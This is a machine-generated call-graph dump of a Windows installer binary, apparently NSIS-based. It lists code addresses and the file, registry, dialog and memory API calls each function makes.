40271f SetFilePointer MultiByteToWideChar 4753->4754 4755 4027bf 4753->4755 4754->4753 4755->4745 4756 4027e0 SetFilePointer 4755->4756 4756->4745 4758 405ee4 4757->4758 4763 405f00 4757->4763 4759 405e6a ReadFile 4758->4759 4760 405ef0 4759->4760 4761 405f31 SetFilePointer 4760->4761 4762 405f09 SetFilePointer 4760->4762 4760->4763 4761->4763 4762->4761 4764 405f14 4762->4764 4763->4748 4765 405e99 WriteFile 4764->4765 4765->4763 4766->4745 5334 401563 5335 402a81 5334->5335 5338 406159 wsprintfW 5335->5338 5337 402a86 5338->5337 5346 4052e5 5347 4052f5 5346->5347 5348 405309 5346->5348 5350 405352 5347->5350 5351 4052fb 5347->5351 5349 405311 IsWindowVisible 5348->5349 5357 405328 5348->5357 5349->5350 5352 40531e 5349->5352 5353 405357 CallWindowProcW 5350->5353 5354 404322 SendMessageW 5351->5354 5359 404c3b SendMessageW 5352->5359 5356 405305 5353->5356 5354->5356 5357->5353 5364 404cbb 5357->5364 5360 404c9a SendMessageW 5359->5360 5361 404c5e GetMessagePos ScreenToClient SendMessageW 5359->5361 5362 404c92 5360->5362 5361->5362 5363 404c97 5361->5363 5362->5357 5363->5360 5373 406212 lstrcpynW 5364->5373 5366 404cce 5374 406159 wsprintfW 5366->5374 5368 404cd8 5369 40140b 2 API calls 5368->5369 5370 404ce1 5369->5370 5375 406212 lstrcpynW 5370->5375 5372 404ce8 5372->5350 5373->5366 5374->5368 5375->5372 5376 401968 5377 402c31 18 API calls 5376->5377 5378 40196f 5377->5378 5379 402c31 18 API calls 5378->5379 5380 40197c 5379->5380 5381 402c53 18 API calls 5380->5381 5382 401993 lstrlenW 5381->5382 5383 4019a4 5382->5383 5384 4019e5 5383->5384 5388 406212 lstrcpynW 5383->5388 5386 4019d5 5386->5384 5387 4019da lstrlenW 5386->5387 5387->5384 5388->5386 5389 100018a9 5390 100018cc 5389->5390 5391 100018ff GlobalFree 5390->5391 5392 10001911 5390->5392 5391->5392 5393 10001272 2 API calls 5392->5393 5394 10001a87 GlobalFree GlobalFree 5393->5394 4771 4023ea 4772 4023f0 4771->4772 4773 402c53 18 API calls 4772->4773 4774 402402 4773->4774 4775 402c53 18 API calls 4774->4775 4776 40240c RegCreateKeyExW 4775->4776 4777 402436 4776->4777 4778 4028a1 4776->4778 4779 402c53 18 API calls 4777->4779 4780 402451 4777->4780 4783 402447 lstrlenW 4779->4783 4781 40245d 4780->4781 4784 402c31 18 API calls 4780->4784 4782 40247c RegSetValueExW 4781->4782 4785 40317b 45 API calls 4781->4785 4786 402492 RegCloseKey 4782->4786 4783->4780 4784->4781 4785->4782 4786->4778 5395 40166a 5396 402c53 18 API calls 5395->5396 5397 401670 5396->5397 5398 406555 2 API calls 5397->5398 5399 401676 5398->5399 5400 4043ea lstrcpynW lstrlenW 5401 404ced GetDlgItem GetDlgItem 5402 404d3f 7 API calls 5401->5402 5405 404f58 5401->5405 5403 404de2 DeleteObject 5402->5403 5404 404dd5 SendMessageW 5402->5404 5406 404deb 5403->5406 5404->5403 5416 404c3b 5 API calls 5405->5416 5426 40503c 5405->5426 5433 404fc9 5405->5433 5407 404e22 5406->5407 5410 406234 18 API calls 5406->5410 5408 4042d6 19 API calls 5407->5408 5411 404e36 5408->5411 5409 4050e8 5413 4050f2 SendMessageW 5409->5413 5414 4050fa 5409->5414 5415 404e04 SendMessageW SendMessageW 5410->5415 5417 4042d6 19 API calls 5411->5417 5412 404f4b 5419 40433d 8 API calls 5412->5419 5413->5414 5421 405113 5414->5421 5422 40510c ImageList_Destroy 5414->5422 5430 405123 5414->5430 5415->5406 5416->5433 5434 404e44 5417->5434 5418 405095 SendMessageW 5418->5412 5424 4050aa SendMessageW 5418->5424 5425 4052de 5419->5425 5420 40502e SendMessageW 5420->5426 5427 40511c GlobalFree 5421->5427 5421->5430 5422->5421 5423 405292 5423->5412 5431 4052a4 ShowWindow GetDlgItem ShowWindow 5423->5431 5429 4050bd 5424->5429 5426->5409 5426->5412 5426->5418 5427->5430 5428 404f19 GetWindowLongW SetWindowLongW 5432 404f32 5428->5432 5440 4050ce SendMessageW 5429->5440 5430->5423 5444 404cbb 4 API calls 5430->5444 5448 40515e 5430->5448 5431->5412 5435 404f50 5432->5435 5436 404f38 ShowWindow 5432->5436 5433->5420 5433->5426 5434->5428 5439 404e94 SendMessageW 5434->5439 5441 404f13 5434->5441 5442 404ed0 SendMessageW 5434->5442 5443 404ee1 SendMessageW 5434->5443 5453 40430b SendMessageW 5435->5453 5452 40430b SendMessageW 5436->5452 5439->5434 5440->5409 5441->5428 5441->5432 5442->5434 5443->5434 5444->5448 5445 405268 InvalidateRect 5445->5423 5446 40527e 5445->5446 5454 404bf6 5446->5454 5447 40518c SendMessageW 5450 4051a2 5447->5450 5448->5447 5448->5450 5450->5445 5451 405216 SendMessageW SendMessageW 5450->5451 5451->5450 5452->5412 5453->5405 5457 404b2d 5454->5457 5456 404c0b 5456->5423 5458 404b46 5457->5458 5459 406234 18 API calls 5458->5459 5460 404baa 5459->5460 5461 406234 18 API calls 5460->5461 5462 404bb5 5461->5462 5463 406234 18 API calls 5462->5463 5464 404bcb lstrlenW wsprintfW SetDlgItemTextW 5463->5464 5464->5456 5465 401ced 5466 402c31 18 API calls 5465->5466 5467 401cf3 IsWindow 5466->5467 5468 401a20 5467->5468 4788 40176f 4789 402c53 18 API calls 4788->4789 4790 401776 4789->4790 4791 401796 4790->4791 4792 40179e 4790->4792 4827 406212 lstrcpynW 4791->4827 4828 406212 lstrcpynW 4792->4828 4795 4017a9 4797 405bc6 3 API calls 4795->4797 4796 40179c 4799 4064a6 5 API calls 4796->4799 4798 4017af lstrcatW 4797->4798 4798->4796 4816 4017bb 4799->4816 4800 406555 2 API calls 4800->4816 4801 405dc2 2 API calls 4801->4816 4803 4017cd CompareFileTime 4803->4816 4804 40188d 4806 405371 25 API calls 4804->4806 4805 401864 4807 405371 25 API calls 4805->4807 4815 401879 4805->4815 4809 401897 4806->4809 4807->4815 4808 406212 lstrcpynW 4808->4816 4810 40317b 45 API calls 4809->4810 4811 4018aa 4810->4811 4812 4018be SetFileTime 4811->4812 4814 4018d0 CloseHandle 4811->4814 4812->4814 4813 406234 18 API calls 4813->4816 4814->4815 4817 4018e1 4814->4817 4816->4800 4816->4801 4816->4803 4816->4804 4816->4805 4816->4808 4816->4813 4824 405957 MessageBoxIndirectW 4816->4824 4826 405de7 GetFileAttributesW CreateFileW 4816->4826 4818 4018e6 4817->4818 4819 4018f9 4817->4819 4821 406234 18 API calls 4818->4821 4820 406234 18 API calls 4819->4820 4823 401901 4820->4823 4822 4018ee lstrcatW 4821->4822 4822->4823 4825 405957 MessageBoxIndirectW 4823->4825 4824->4816 4825->4815 4826->4816 4827->4796 4828->4795 4899 401b71 4900 401bc2 4899->4900 4901 401b7e 4899->4901 4903 401bc7 4900->4903 4904 401bec GlobalAlloc 4900->4904 4902 401c07 4901->4902 4907 401b95 4901->4907 4906 406234 18 API calls 4902->4906 4912 4022f7 4902->4912 4903->4912 4920 406212 lstrcpynW 4903->4920 4905 406234 18 API calls 4904->4905 4905->4902 4908 4022f1 4906->4908 4918 406212 lstrcpynW 4907->4918 4914 405957 MessageBoxIndirectW 4908->4914 4911 401bd9 GlobalFree 4911->4912 4913 401ba4 4919 406212 lstrcpynW 4913->4919 4914->4912 4916 401bb3 4921 406212 lstrcpynW 4916->4921 4918->4913 4919->4916 4920->4911 4921->4912 5469 404771 5470 40479d 5469->5470 5471 4047ae 5469->5471 5530 40593b GetDlgItemTextW 5470->5530 5473 4047ba GetDlgItem 5471->5473 5476 404819 5471->5476 5475 4047ce 5473->5475 5474 4047a8 5477 4064a6 5 API calls 5474->5477 5479 4047e2 SetWindowTextW 5475->5479 5484 405c71 4 API calls 5475->5484 5480 406234 18 API calls 5476->5480 5491 4048fd 5476->5491 5528 404aac 5476->5528 5477->5471 5482 4042d6 19 API calls 5479->5482 5485 40488d SHBrowseForFolderW 5480->5485 5481 40492d 5486 405cce 18 API calls 5481->5486 5487 4047fe 5482->5487 5483 40433d 8 API calls 5488 404ac0 5483->5488 5489 4047d8 5484->5489 5490 4048a5 CoTaskMemFree 5485->5490 5485->5491 5492 404933 5486->5492 5493 4042d6 19 API calls 5487->5493 5489->5479 5494 405bc6 3 API calls 5489->5494 5495 405bc6 3 API calls 5490->5495 5491->5528 5532 40593b GetDlgItemTextW 5491->5532 5533 406212 lstrcpynW 5492->5533 5496 40480c 5493->5496 5494->5479 5497 4048b2 5495->5497 5531 40430b SendMessageW 5496->5531 5500 4048e9 SetDlgItemTextW 5497->5500 5505 406234 18 API calls 5497->5505 5500->5491 5501 404812 5503 4065ec 5 API calls 5501->5503 5502 40494a 5504 4065ec 5 API calls 5502->5504 5503->5476 5511 404951 5504->5511 5506 4048d1 lstrcmpiW 5505->5506 5506->5500 5509 4048e2 lstrcatW 5506->5509 5507 404992 5534 406212 lstrcpynW 5507->5534 5509->5500 5510 404999 5512 405c71 4 API calls 5510->5512 5511->5507 5515 405c12 2 API calls 5511->5515 5517 4049ea 5511->5517 5513 40499f GetDiskFreeSpaceW 5512->5513 5516 4049c3 MulDiv 5513->5516 5513->5517 5515->5511 5516->5517 5518 404a5b 5517->5518 5520 404bf6 21 API calls 5517->5520 5519 404a7e 5518->5519 5521 40140b 2 API calls 5518->5521 5535 4042f8 KiUserCallbackDispatcher 5519->5535 5522 404a48 5520->5522 5521->5519 5524 404a5d SetDlgItemTextW 5522->5524 5525 404a4d 5522->5525 5524->5518 5527 404b2d 21 API calls 5525->5527 5526 404a9a 5526->5528 5536 404706 5526->5536 5527->5518 5528->5483 5530->5474 5531->5501 5532->5481 5533->5502 5534->5510 5535->5526 5537 404714 5536->5537 5538 404719 SendMessageW 5536->5538 5537->5538 5538->5528 5539 401a72 5540 402c31 18 API calls 5539->5540 5541 401a78 5540->5541 5542 402c31 18 API calls 5541->5542 5543 401a20 5542->5543 5544 404473 5545 40448b 5544->5545 5549 4045a5 5544->5549 5550 4042d6 19 API calls 5545->5550 5546 40460f 5547 4046e1 5546->5547 5548 404619 GetDlgItem 5546->5548 5554 40433d 8 API calls 5547->5554 5551 4046a2 5548->5551 5555 404633 5548->5555 5549->5546 5549->5547 5552 4045e0 GetDlgItem SendMessageW 5549->5552 5553 4044f2 5550->5553 5551->5547 5556 4046b4 5551->5556 5575 4042f8 KiUserCallbackDispatcher 5552->5575 5558 4042d6 19 API calls 5553->5558 5559 4046dc 5554->5559 5555->5551 5560 404659 6 API calls 5555->5560 5561 4046ca 5556->5561 5562 4046ba SendMessageW 5556->5562 5564 4044ff CheckDlgButton 5558->5564 5560->5551 5561->5559 5565 4046d0 SendMessageW 5561->5565 5562->5561 5563 40460a 5566 404706 SendMessageW 5563->5566 5573 4042f8 KiUserCallbackDispatcher 5564->5573 5565->5559 5566->5546 5568 40451d GetDlgItem 5574 40430b SendMessageW 5568->5574 5570 404533 SendMessageW 5571 404550 GetSysColor 5570->5571 5572 404559 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5570->5572 5571->5572 5572->5559 5573->5568 5574->5570 5575->5563 5576 401573 5577 401583 ShowWindow 5576->5577 5578 40158c 5576->5578 5577->5578 5579 40159a ShowWindow 5578->5579 5580 402adb 5578->5580 5579->5580 5581 4014f5 SetForegroundWindow 5582 402adb 5581->5582 5583 100016b6 5584 100016e5 5583->5584 5585 10001b18 22 API calls 5584->5585 5586 100016ec 5585->5586 5587 100016f3 5586->5587 5588 100016ff 5586->5588 5591 10001272 2 API calls 5587->5591 5589 10001726 5588->5589 5590 10001709 5588->5590 5593 10001750 5589->5593 5594 1000172c 5589->5594 5592 1000153d 3 API calls 5590->5592 5595 100016fd 5591->5595 5596 1000170e 5592->5596 5598 1000153d 3 API calls 5593->5598 5597 100015b4 3 API calls 5594->5597 5599 100015b4 3 API calls 5596->5599 5600 10001731 5597->5600 5598->5595 5601 10001714 5599->5601 5602 10001272 2 API calls 5600->5602 5603 10001272 2 API calls 5601->5603 5604 10001737 GlobalFree 5602->5604 5605 1000171a GlobalFree 5603->5605 5604->5595 5606 1000174b GlobalFree 5604->5606 5605->5595 5606->5595 5103 401e77 5104 402c53 18 API calls 5103->5104 5105 401e7d 5104->5105 5106 402c53 18 API calls 5105->5106 5107 401e86 5106->5107 5108 402c53 18 API calls 5107->5108 5109 401e8f 5108->5109 5110 402c53 18 API calls 5109->5110 5111 401e98 5110->5111 5112 401423 25 API calls 5111->5112 5113 401e9f ShellExecuteW 5112->5113 5114 401ed0 5113->5114 5607 10002238 5608 10002296 5607->5608 5609 100022cc 5607->5609 5608->5609 5610 100022a8 GlobalAlloc 5608->5610 5610->5608 5115 40167b 5116 402c53 18 API calls 5115->5116 5117 401682 5116->5117 5118 402c53 18 API calls 5117->5118 5119 40168b 5118->5119 5120 402c53 18 API calls 5119->5120 5121 401694 MoveFileW 5120->5121 5122 4016a7 5121->5122 5128 4016a0 5121->5128 5123 402250 5122->5123 5125 406555 2 API calls 5122->5125 5124 401423 25 API calls 5124->5123 5126 4016b6 5125->5126 5126->5123 5127 4060b3 38 API calls 5126->5127 5127->5128 5128->5124 5618 1000103d 5619 1000101b 5 API calls 5618->5619 5620 10001056 5619->5620 5129 403dfe 5130 403f51 5129->5130 5131 403e16 5129->5131 5133 403f62 GetDlgItem GetDlgItem 5130->5133 5134 403fa2 5130->5134 5131->5130 5132 403e22 5131->5132 5136 403e40 5132->5136 5137 403e2d SetWindowPos 5132->5137 5138 4042d6 19 API calls 5133->5138 5135 403ffc 5134->5135 5143 401389 2 API calls 5134->5143 5139 404322 SendMessageW 5135->5139 5144 403f4c 5135->5144 5140 403e45 ShowWindow 5136->5140 5141 403e5d 5136->5141 5137->5136 5142 403f8c SetClassLongW 5138->5142 5167 40400e 5139->5167 5140->5141 5145 403e65 DestroyWindow 5141->5145 5146 403e7f 5141->5146 5147 40140b 2 API calls 5142->5147 5148 403fd4 5143->5148 5149 40425f 5145->5149 5150 403e84 SetWindowLongW 5146->5150 5151 403e95 5146->5151 5147->5134 5148->5135 5154 403fd8 SendMessageW 5148->5154 5149->5144 5160 404290 ShowWindow 5149->5160 5150->5144 5152 403ea1 GetDlgItem 5151->5152 5153 403f3e 5151->5153 5157 403ed1 5152->5157 5158 403eb4 SendMessageW IsWindowEnabled 5152->5158 5159 40433d 8 API calls 5153->5159 5154->5144 5155 40140b 2 API calls 5155->5167 5156 404261 DestroyWindow EndDialog 5156->5149 5162 403ede 5157->5162 5163 403f25 SendMessageW 5157->5163 5164 403ef1 5157->5164 5174 403ed6 5157->5174 5158->5144 5158->5157 5159->5144 5160->5144 5161 406234 18 API calls 5161->5167 5162->5163 5162->5174 5163->5153 5168 403ef9 5164->5168 5169 403f0e 5164->5169 5165 4042af SendMessageW 5166 403f0c 5165->5166 5166->5153 5167->5144 5167->5155 5167->5156 5167->5161 5170 4042d6 19 API calls 5167->5170 5175 4042d6 19 API calls 5167->5175 5190 4041a1 DestroyWindow 5167->5190 5172 40140b 2 API calls 5168->5172 5171 40140b 2 API calls 5169->5171 5170->5167 5173 403f15 5171->5173 5172->5174 5173->5153 5173->5174 5174->5165 5176 404089 GetDlgItem 5175->5176 5177 4040a6 ShowWindow KiUserCallbackDispatcher 5176->5177 5178 40409e 5176->5178 5199 4042f8 KiUserCallbackDispatcher 5177->5199 5178->5177 5180 4040d0 EnableWindow 5183 4040e4 5180->5183 5181 4040e9 GetSystemMenu EnableMenuItem SendMessageW 5182 404119 SendMessageW 5181->5182 5181->5183 5182->5183 5183->5181 5200 40430b SendMessageW 5183->5200 5201 406212 lstrcpynW 5183->5201 5186 404147 lstrlenW 5187 406234 18 API calls 5186->5187 5188 40415d SetWindowTextW 5187->5188 5189 401389 2 API calls 5188->5189 5189->5167 5190->5149 5191 4041bb CreateDialogParamW 5190->5191 5191->5149 5192 4041ee 5191->5192 5193 4042d6 19 API calls 5192->5193 5194 4041f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5193->5194 5195 401389 2 API calls 5194->5195 5196 40423f 5195->5196 5196->5144 5197 404247 ShowWindow 5196->5197 5198 404322 SendMessageW 5197->5198 5198->5149 5199->5180 5200->5183 5201->5186 5621 40287e 5622 402c53 18 API calls 5621->5622 5623 402885 FindFirstFileW 5622->5623 5624 4028ad 5623->5624 5628 402898 5623->5628 5626 4028b6 5624->5626 5629 406159 wsprintfW 5624->5629 5630 406212 lstrcpynW 5626->5630 5629->5626 5630->5628 5631 4019ff 5632 402c53 18 API calls 5631->5632 5633 401a06 5632->5633 5634 402c53 18 API calls 5633->5634 5635 401a0f 5634->5635 5636 401a16 lstrcmpiW 5635->5636 5637 401a28 lstrcmpW 5635->5637 5638 401a1c 5636->5638 5637->5638 5639 401000 5640 401037 BeginPaint GetClientRect 5639->5640 5641 40100c DefWindowProcW 5639->5641 5643 4010f3 5640->5643 5644 401179 5641->5644 5645 401073 CreateBrushIndirect FillRect DeleteObject 5643->5645 5646 4010fc 5643->5646 5645->5643 5647 401102 CreateFontIndirectW 5646->5647 5648 401167 EndPaint 5646->5648 5647->5648 5649 401112 6 API calls 5647->5649 5648->5644 5649->5648 5650 401503 5651 40150b 5650->5651 5653 40151e 5650->5653 5652 402c31 18 API calls 5651->5652 5652->5653 4267 402104 4268 402c53 18 API calls 4267->4268 4269 40210b 4268->4269 4270 402c53 18 API calls 4269->4270 4271 402115 4270->4271 4272 402c53 18 API calls 4271->4272 4273 40211f 4272->4273 4274 402c53 18 API calls 4273->4274 4275 402129 4274->4275 4276 402c53 18 API calls 4275->4276 4278 402133 4276->4278 4277 402172 CoCreateInstance 4282 402191 4277->4282 4278->4277 4279 402c53 18 API calls 4278->4279 4279->4277 4280 401423 25 API calls 4281 402250 4280->4281 4282->4280 4282->4281 4283 402805 4284 40280c 4283->4284 4290 402a86 4283->4290 4285 402c31 18 API calls 4284->4285 4286 402813 4285->4286 4287 402822 SetFilePointer 4286->4287 4288 402832 4287->4288 4287->4290 4291 406159 wsprintfW 4288->4291 4291->4290 4292 100027c7 4293 10002817 4292->4293 4294 100027d7 VirtualProtect 4292->4294 4294->4293 4608 40230c 4609 402314 4608->4609 4612 40231a 4608->4612 4610 402c53 18 API calls 4609->4610 4610->4612 4611 402328 4614 402336 4611->4614 4615 402c53 18 API calls 4611->4615 4612->4611 4613 402c53 18 API calls 4612->4613 4613->4611 4616 402c53 18 API calls 4614->4616 4615->4614 4617 40233f WritePrivateProfileStringW 4616->4617 5654 40190c 5655 401943 5654->5655 5656 402c53 18 API calls 5655->5656 5657 401948 5656->5657 5658 405a03 69 API calls 5657->5658 5659 401951 5658->5659 5660 401f8c 5661 402c53 18 API calls 5660->5661 5662 401f93 5661->5662 5663 4065ec 5 API calls 5662->5663 5664 401fa2 5663->5664 5665 401fbe GlobalAlloc 5664->5665 5667 402026 5664->5667 5666 401fd2 5665->5666 5665->5667 5668 4065ec 5 API calls 5666->5668 5669 401fd9 5668->5669 5670 4065ec 5 API calls 5669->5670 5671 401fe3 5670->5671 5671->5667 5675 406159 wsprintfW 5671->5675 5673 402018 5676 406159 wsprintfW 5673->5676 5675->5673 5676->5667 5677 40258c 5678 402c53 18 API calls 5677->5678 5679 402593 5678->5679 5682 405de7 GetFileAttributesW CreateFileW 5679->5682 5681 40259f 5682->5681 4625 40238e 4626 402393 4625->4626 4627 4023be 4625->4627 4648 402d5d 4626->4648 4629 402c53 18 API calls 4627->4629 4631 4023c5 4629->4631 4630 40239a 4632 4023a4 4630->4632 4633 4023db 4630->4633 4637 402c93 RegOpenKeyExW 4631->4637 4634 402c53 18 API calls 4632->4634 4636 4023ab RegDeleteValueW RegCloseKey 4634->4636 4636->4633 4638 402d27 4637->4638 4641 402cbe 4637->4641 4638->4633 4639 402ce4 RegEnumKeyW 4640 402cf6 RegCloseKey 4639->4640 4639->4641 4643 4065ec 5 API calls 4640->4643 4641->4639 4641->4640 4642 402d1b RegCloseKey 4641->4642 4644 402c93 5 API calls 4641->4644 4647 402d0a 4642->4647 4645 402d06 4643->4645 4644->4641 4646 402d36 RegDeleteKeyW 4645->4646 4645->4647 4646->4647 4647->4638 4649 402c53 18 API calls 4648->4649 4650 402d76 4649->4650 4651 402d84 RegOpenKeyExW 4650->4651 4651->4630 5683 401d0e 5684 402c31 18 API calls 5683->5684 5685 401d15 5684->5685 5686 402c31 18 API calls 5685->5686 5687 401d21 GetDlgItem 5686->5687 5688 4025a8 5687->5688 5688->5688 5689 1000164f 5690 10001516 GlobalFree 5689->5690 5692 10001667 5690->5692 5691 100016ad GlobalFree 5692->5691 5693 10001682 5692->5693 5694 10001699 VirtualFree 5692->5694 5693->5691 5694->5691 5695 40190f 5696 402c53 18 API calls 5695->5696 5697 401916 5696->5697 5698 405957 MessageBoxIndirectW 5697->5698 5699 40191f 5698->5699 4652 402511 4653 402d5d 19 API calls 4652->4653 4654 40251b 4653->4654 4655 402c31 18 API calls 4654->4655 4656 402524 4655->4656 4657 402540 RegEnumKeyW 4656->4657 4658 40254c RegEnumValueW 4656->4658 4659 4028a1 4656->4659 4660 402565 RegCloseKey 4657->4660 4658->4659 4658->4660 4660->4659 5714 401491 5715 405371 25 API calls 5714->5715 5716 401498 5715->5716 5724 10001058 5726 10001074 5724->5726 5725 100010dd 5726->5725 5727 10001092 5726->5727 5728 10001516 GlobalFree 5726->5728 5729 10001516 GlobalFree 5727->5729 5728->5727 5730 100010a2 5729->5730 5731 100010b2 5730->5731 5732 100010a9 GlobalSize 5730->5732 5733 100010b6 GlobalAlloc 5731->5733 5734 100010c7 5731->5734 5732->5731 5735 1000153d 3 API calls 5733->5735 5736 100010d2 GlobalFree 5734->5736 5735->5734 5736->5725 5737 402d98 5738 402dc3 5737->5738 5739 402daa SetTimer 5737->5739 5740 402e11 5738->5740 5741 402e17 MulDiv 5738->5741 5739->5738 5743 402dd1 wsprintfW SetWindowTextW SetDlgItemTextW 5741->5743 5743->5740 4686 401c19 4687 402c31 18 API calls 4686->4687 4688 401c20 4687->4688 4689 402c31 18 API calls 4688->4689 4690 401c2d 4689->4690 4691 401c42 4690->4691 4692 402c53 18 API calls 4690->4692 4693 401c52 4691->4693 4694 402c53 18 API calls 4691->4694 4692->4691 4695 401ca9 4693->4695 4696 401c5d 4693->4696 4694->4693 4697 402c53 18 API calls 4695->4697 4698 402c31 18 API calls 4696->4698 4699 401cae 4697->4699 4700 401c62 4698->4700 4702 402c53 18 API calls 4699->4702 4701 402c31 18 API calls 4700->4701 4703 401c6e 4701->4703 4704 401cb7 FindWindowExW 4702->4704 4705 401c99 SendMessageW 4703->4705 4706 401c7b SendMessageTimeoutW 4703->4706 4707 401cd9 4704->4707 4705->4707 4706->4707 5744 403a19 5745 403a24 5744->5745 5746 403a28 5745->5746 5747 403a2b GlobalAlloc 5745->5747 5747->5746 4731 40249d 4732 402d5d 19 API calls 4731->4732 4733 4024a7 4732->4733 4734 402c53 18 API calls 4733->4734 4735 4024b0 4734->4735 4736 4024bb RegQueryValueExW 4735->4736 4739 4028a1 4735->4739 4737 4024e1 RegCloseKey 4736->4737 4738 4024db 4736->4738 4737->4739 4738->4737 4742 406159 wsprintfW 4738->4742 4742->4737 5748 40149e 5749 4022f7 5748->5749 5750 4014ac PostQuitMessage 5748->5750 5750->5749 5751 100010e1 5760 10001111 5751->5760 5752 100011d8 GlobalFree 5753 100012ba 2 API calls 5753->5760 5754 100011d3 5754->5752 5755 10001164 GlobalAlloc 5755->5760 5756 100011f8 GlobalFree 5756->5760 5757 10001272 2 API calls 5759 100011c4 GlobalFree 5757->5759 5758 100012e1 lstrcpyW 5758->5760 5759->5760 5760->5752 5760->5753 5760->5754 5760->5755 5760->5756 5760->5757 5760->5758 5760->5759 4767 4015a3 4768 402c53 18 API calls 4767->4768 4769 4015aa SetFileAttributesW 4768->4769 4770 4015bc 4769->4770 5761 404424 lstrlenW 5762 404443 5761->5762 5763 404445 WideCharToMultiByte 5761->5763 5762->5763 5771 40472a 5772 404760 5771->5772 5773 40473a 5771->5773 5775 40433d 8 API calls 5772->5775 5774 4042d6 19 API calls 5773->5774 5776 404747 SetDlgItemTextW 5774->5776 5777 40476c 5775->5777 5776->5772 5778 4025ae 5779 4025c2 5778->5779 5780 4025dd 5778->5780 5781 402c31 18 API calls 5779->5781 5782 402611 5780->5782 5783 4025e2 5780->5783 5788 4025c9 5781->5788 5785 402c53 18 API calls 5782->5785 5784 402c53 18 API calls 5783->5784 5787 4025e9 WideCharToMultiByte lstrlenA 5784->5787 5786 402618 lstrlenW 5785->5786 5786->5788 5787->5788 5789 40265b 5788->5789 5790 402645 5788->5790 5792 405ec8 5 API calls 5788->5792 5790->5789 5791 405e99 WriteFile 5790->5791 5791->5789 5792->5790 4829 4054b0 4830 4054d1 GetDlgItem GetDlgItem GetDlgItem 4829->4830 4831 40565a 4829->4831 4875 40430b SendMessageW 4830->4875 4833 405663 GetDlgItem CreateThread CloseHandle 4831->4833 4834 40568b 4831->4834 4833->4834 4898 405444 5 API calls 4833->4898 4835 4056b6 4834->4835 4837 4056a2 ShowWindow ShowWindow 4834->4837 4838 4056db 4834->4838 4839 4056c2 4835->4839 4840 405716 4835->4840 4836 405541 4841 405548 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4836->4841 4880 40430b SendMessageW 4837->4880 4884 40433d 4838->4884 4843 4056f0 ShowWindow 4839->4843 4844 4056ca 4839->4844 4840->4838 4848 405724 SendMessageW 4840->4848 4846 4055b6 4841->4846 4847 40559a SendMessageW SendMessageW 4841->4847 4850 405710 4843->4850 4851 405702 4843->4851 4881 4042af 4844->4881 4852 4055c9 4846->4852 4853 4055bb SendMessageW 4846->4853 4847->4846 4854 4056e9 4848->4854 4855 40573d CreatePopupMenu 4848->4855 4857 4042af SendMessageW 4850->4857 4856 405371 25 API calls 4851->4856 4876 4042d6 4852->4876 4853->4852 4858 406234 18 API calls 4855->4858 4856->4850 4857->4840 4860 40574d AppendMenuW 4858->4860 4862 40576a GetWindowRect 4860->4862 4863 40577d TrackPopupMenu 4860->4863 4861 4055d9 4864 4055e2 ShowWindow 4861->4864 4865 405616 GetDlgItem SendMessageW 4861->4865 4862->4863 4863->4854 4866 405798 4863->4866 4867 405605 4864->4867 4868 4055f8 ShowWindow 4864->4868 4865->4854 4869 40563d SendMessageW SendMessageW 4865->4869 4870 4057b4 SendMessageW 4866->4870 4879 40430b SendMessageW 4867->4879 4868->4867 4869->4854 4870->4870 4871 4057d1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4870->4871 4873 4057f6 SendMessageW 4871->4873 4873->4873 4874 40581f GlobalUnlock SetClipboardData CloseClipboard 4873->4874 4874->4854 4875->4836 4877 406234 18 API calls 4876->4877 4878 4042e1 SetDlgItemTextW 4877->4878 4878->4861 4879->4865 4880->4835 4882 4042b6 4881->4882 4883 4042bc SendMessageW 4881->4883 4882->4883 4883->4838 4885 404355 GetWindowLongW 4884->4885 4886 4043de 4884->4886 4885->4886 4887 404366 4885->4887 4886->4854 4888 404375 GetSysColor 4887->4888 4889 404378 4887->4889 4888->4889 4890 404388 SetBkMode 4889->4890 4891 40437e SetTextColor 4889->4891 4892 4043a0 GetSysColor 4890->4892 4893 4043a6 4890->4893 4891->4890 4892->4893 4894 4043b7 4893->4894 4895 4043ad SetBkColor 4893->4895 4894->4886 4896 4043d1 CreateBrushIndirect 4894->4896 4897 4043ca DeleteObject 4894->4897 4895->4894 4896->4886 4897->4896 5793 401a30 5794 402c53 18 API calls 5793->5794 5795 401a39 ExpandEnvironmentStringsW 5794->5795 5796 401a4d 5795->5796 5798 401a60 5795->5798 5797 401a52 lstrcmpW 5796->5797 5796->5798 5797->5798 4922 402032 4923 402044 4922->4923 4924 4020f6 4922->4924 4925 402c53 18 API calls 4923->4925 4926 401423 25 API calls 4924->4926 4927 40204b 4925->4927 4932 402250 4926->4932 4928 402c53 18 API calls 4927->4928 4929 402054 4928->4929 4930 40206a LoadLibraryExW 4929->4930 4931 40205c GetModuleHandleW 4929->4931 4930->4924 4933 40207b 4930->4933 4931->4930 4931->4933 4945 40665b WideCharToMultiByte 4933->4945 4936 4020c5 4940 405371 25 API calls 4936->4940 4937 40208c 4938 402094 4937->4938 4939 4020ab 4937->4939 4941 401423 25 API calls 4938->4941 4948 10001759 4939->4948 4942 40209c 4940->4942 4941->4942 4942->4932 4943 4020e8 FreeLibrary 4942->4943 4943->4932 4946 406685 GetProcAddress 4945->4946 4947 402086 4945->4947 4946->4947 4947->4936 4947->4937 4949 10001789 4948->4949 4990 10001b18 4949->4990 4951 10001790 4952 100018a6 4951->4952 4953 100017a1 4951->4953 4954 100017a8 4951->4954 4952->4942 5039 10002286 4953->5039 5022 100022d0 4954->5022 4959 100017cd 4960 1000180c 4959->4960 4961 100017ee 4959->4961 4964 10001812 4960->4964 4965 1000184e 4960->4965 5052 100024a9 4961->5052 4962 100017be 4968 100017c4 4962->4968 4969 100017cf 4962->4969 4971 100015b4 3 API calls 4964->4971 4973 100024a9 10 API calls 4965->4973 4966 100017d7 4966->4959 5049 10002b5f 4966->5049 4967 100017f4 5063 100015b4 4967->5063 4968->4959 5033 100028a4 4968->5033 5043 10002645 4969->5043 4977 10001828 4971->4977 4974 10001840 4973->4974 4981 10001895 4974->4981 5071 1000246c 4974->5071 4980 100024a9 10 API calls 4977->4980 4979 100017d5 4979->4959 4980->4974 4981->4952 4985 1000189f GlobalFree 4981->4985 4982 10001272 2 API calls 4984 10001800 GlobalFree 4982->4984 4984->4974 4985->4952 4987 10001881 4987->4981 4989 1000153d 3 API calls 4987->4989 4988 1000187a FreeLibrary 4988->4987 4989->4981 5075 1000121b GlobalAlloc 4990->5075 4992 10001b3c 5076 1000121b GlobalAlloc 4992->5076 